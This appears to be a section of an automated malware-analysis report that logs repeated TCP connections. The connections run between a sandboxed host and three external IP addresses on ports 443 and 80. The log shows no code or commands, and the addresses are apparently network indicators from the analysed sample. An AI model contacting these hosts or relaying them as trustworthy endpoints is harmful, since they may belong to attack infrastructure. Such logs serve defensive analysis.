                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49168
